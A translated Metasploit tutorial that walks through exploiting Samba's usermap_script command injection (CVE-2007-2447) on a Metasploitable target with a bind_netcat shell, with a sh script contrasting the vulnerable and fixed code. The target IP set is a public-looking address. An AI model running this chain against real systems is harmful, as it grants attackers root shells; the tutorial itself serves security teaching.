《Metasploit 魔鬼训练营》 01: A First Look at Metasploit

xiaoxiao, 2021-03-01

The command to start the MSF console is:

root@kali:~# msfconsole    # start the console
(ASCII-art banner omitted)

       =[ metasploit v4.16.30-dev                         ]
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post       ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

The “help” command lists the commands the MSF console supports. For most of them you can type “help [COMMAND]” to get usage information for that one command. For example, to learn how to use “search”, the command that finds modules, type “help search” in the console; it prints the command's keyword list with the meaning and possible values of each keyword.

msf > help search
Usage: search [keywords]

Keywords:
  app      : Modules that are client or server attacks
  author   : Modules written by this author
  bid      : Modules with a matching Bugtraq ID
  cve      : Modules with a matching CVE ID
  edb      : Modules with a matching Exploit-DB ID
  name     : Modules with a matching descriptive name
  platform : Modules affecting this platform
  ref      : Modules with a matching ref
  type     : Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client

We again target the Samba service vulnerability on the Linux Metasploitable machine. First, use “search” to pull the modules that attack Samba out of Metasploit's large exploit library. As shown below, the results include a mix of auxiliary modules and exploit modules (plus a few unrelated hits such as distcc_exec and sambar6_search_results, because the search matches any text in a module's name or description). Among them, the exploit module for the usermap_script vulnerability is exploit/multi/samba/usermap_script, ranked “excellent”.

msf > search samba

Matching Modules
================

   Name                                             Disclosure Date  Rank       Description
   ----                                             ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                       normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                             normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                           normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                          normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                              normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                             normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                  2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/is_known_pipename            2017-03-24       excellent  Samba is_known_pipename() Arbitrary Module Load
   exploit/linux/samba/lsa_transnames_heap          2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap           2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                   2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                      2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script               2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap            2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap        2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                    2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec   2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm     2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results      2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig      2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup         2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                    normal     Linux Gather Configurations
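The module we just found exploits a command-injection flaw in Samba's “username map script” handling (CVE-2007-2447): the username sent at SMB session setup was interpolated into a shell command string before the mapping script was invoked, so shell metacharacters in the username were executed by smbd, which runs as root. The Metasploit module sends a username of the form /=`<command>`. The script below is an added example written for this page, not Samba or Metasploit code; it reproduces the bug class in POSIX sh with a stand-in mapping script (map_script, which only echoes its argument) and puts the corrected pattern next to it: pass the username as a single argv element, never re-parse it through eval or sh -c, and reject anything outside a conservative allowlist before it reaches the script at all.

```sh
#!/bin/sh
# Added example (constructed for this page; not Samba or Metasploit code).
# Reproduces the "username map script" bug class: a daemon hands an untrusted
# username to an admin-configured script by building a shell command string.

# Stand-in for the administrator's mapping script. It only echoes what it was
# given as its first argument, so we can see exactly what reached it.
map_script() {
  printf 'mapped:%s\n' "$1"
}

# VULNERABLE: the command is assembled as a string and re-parsed by the shell,
# which is what "sh -c" does in a daemon that shells out. Backticks, $(), ;
# and | inside the username are interpreted instead of passed through.
map_user_vuln() {
  cmd="map_script $1"
  eval "$cmd"
}

# HARDENED: the username travels as one argv element and is never re-parsed,
# and anything outside a conservative allowlist is refused up front.
map_user_safe() {
  case $1 in
    "" | *[!A-Za-z0-9._@-]*) printf 'rejected\n'; return 1 ;;
  esac
  map_script "$1"
}

# Demo: the Metasploit module's username shape is /=`<command>`; here the
# injected command is a harmless echo, so its effect is visible in the output
# (the vulnerable path prints "mapped:/=INJECTED", proving the backticks ran).
demo() {
  attacker='/=`echo INJECTED`'
  printf 'vulnerable: '; map_user_vuln "$attacker"
  printf 'hardened:   '; map_user_safe "$attacker" || true
  printf 'hardened:   '; map_user_safe alice
}
demo
```

The contrast is the whole lesson: the vulnerable path needs no special privilege or memory corruption, only a shell that is asked to parse attacker-controlled text, and the fix is to stop re-parsing rather than to blocklist individual characters.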

Next, run “use exploit/multi/samba/usermap_script” to select this exploit module, and “show payloads” to list the payloads compatible with it. “set payload cmd/unix/bind_netcat” selects bind_netcat: after a successful exploit, netcat is used on the target to spawn a shell and bind it to a listening port, which we then connect to. (A bind shell only works if we can reach that port on the target; when the target sits behind a firewall or NAT that blocks inbound connections, one of the cmd/unix/reverse_* payloads, which make the target connect back to us, is the usual alternative.) With the two core pieces chosen, the exploit module and the payload, “show options” lists the parameters that need configuring. The output shows that only RHOST, the target's IP address, must be set; RPORT (the target port, 139), LPORT (the port the payload listens on, 4444) and the exploit target (0, Automatic) can keep their defaults. At that point the attack is fully staged: everything is ready and only the order to fire remains. The commands are:

msf > use exploit/multi/samba/usermap_script    # select the exploit module
msf exploit(multi/samba/usermap_script) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_r                                      normal  Unix Command Shell, Bind TCP (via R)
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_ncat_ssl                            normal  Unix Command Shell, Reverse TCP (via ncat)
   cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_r                                   normal  Unix Command Shell, Reverse TCP (via R)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat    # select the payload module
payload => cmd/unix/bind_netcat
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)

Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/samba/usermap_script) > set RHOST 61.167.199.253    # set RHOST to the target machine's IP address
RHOST => 61.167.199.253

Launching the attack from the MSF console takes one word: type “exploit” and it starts immediately. Almost as soon as you press Enter, the console reports “command shell session 1 opened”, and you can type shell commands into that session, such as uname -a and whoami, to see the target's operating system and the account you are running as. Congratulations: with a handful of simple commands you have obtained root on the Metasploitable target (Samba's smbd runs as root, so the injected command does too). The session is as follows:

Please credit the original URL when reposting: https://www.6miu.com/read-4129371.html
